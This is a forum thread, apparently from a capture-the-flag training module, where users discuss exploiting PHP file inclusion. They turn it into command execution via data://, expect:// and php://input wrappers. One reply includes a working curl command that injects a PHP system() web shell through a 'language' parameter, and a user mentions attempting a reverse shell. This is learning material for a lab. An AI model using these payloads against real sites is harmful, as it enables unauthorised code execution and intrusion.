PHP Wrappers in the File Inclusions module

Is this room bugged? I had success with the data filter. Added an &cmd=id at the end and it worked. Unfortunately I don’t know how to cat out the flag. I sent it to Burp and even URL encoded the cat /flag but that didn’t work either. I changed the request to a POST in Burp and had no access.

Steps: I did base64 encode the php shell and url encoded it. After that I used it with the data// filter and I was able to get “id” and “whoami” but I wasn’t able to get /flag. Any tips?

Edit: Just for science: I tried to get a reverse shell on the system but that didn’t work. Have you been able to get a shell here? Just curious.

“language=expect://id” didn’t work either…

It’s me again.
I used this one:
and added



neither of them worked. What I’m I missing?

You need to look for the file that could contain a flag. It’s not in the same directory as all the other files and it might not be called flag.txt. So next best step is to go through the directories in order to find a possible flag.

Use a wrapper ie input wrapper with the cmd=ls to list the directory you are in.
Then to list a previous directory:


and then furtther back

%20 is just the url encoded for a blank space

(You could also use the data wrapper, I couldn’t get the expect wrapper to work)
For example to see the directories listed, then just keep going until you find the flag:

curl -s -X POST --data ‘<?php system($_GET["cmd"]); ?>’ “http://IP:PORT/index.php?language=php://input&cmd=ls%20…”

1 Like

thanks man